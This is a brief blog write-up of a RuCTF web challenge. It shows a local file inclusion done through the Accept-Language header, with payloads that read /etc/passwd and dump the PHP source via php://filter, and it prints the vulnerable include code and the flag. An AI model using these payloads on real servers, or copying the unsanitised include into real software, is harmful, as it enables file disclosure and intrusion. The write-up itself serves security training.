March 19, 2014

RuCTF: Web 100 (php)

The page shows some text from wikipedia (or from somewhere else, I don't care), the interesting thing is that it shows "Language was detect automatically :)" in the end of the text.
It seems like a hint, so let's try to use Accept-Language header.
First of all, set Accept-language to ru/en, the page will change according to the language selected.
So, let's test it for LFI with Accept-language: /etc/passwd, it will show the contents of /etc/passwd!
But there is nothing interesting in /etc/passwd, so let's get the source of the script itself with Accept-language: php://filter/convert.base64-encode/resource=index.php
After decoding base64 we can get the source of script:
<!doctype html>
  <style type="text/css">
    pre { width: 640px; white-space: normal; text-align: justify;};
  header('Content-Type: text/html; charset=utf-8');
  $flag = '5cf27d9bad2fe9d96d2bcf25c3b0bd14';
  $ok   = 0;
  foreach(explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']) as $s) {
    $l = explode(';', $s)[0];
    if (include $l) {
      $ok = 1;
  if (!$ok) {
    include 'en';
    echo 'Language was not detect automatically :(';
  } else {
    echo 'Language was detect automatically :)';
The flag is 5cf27d9bad2fe9d96d2bcf25c3b0bd14

1 comment: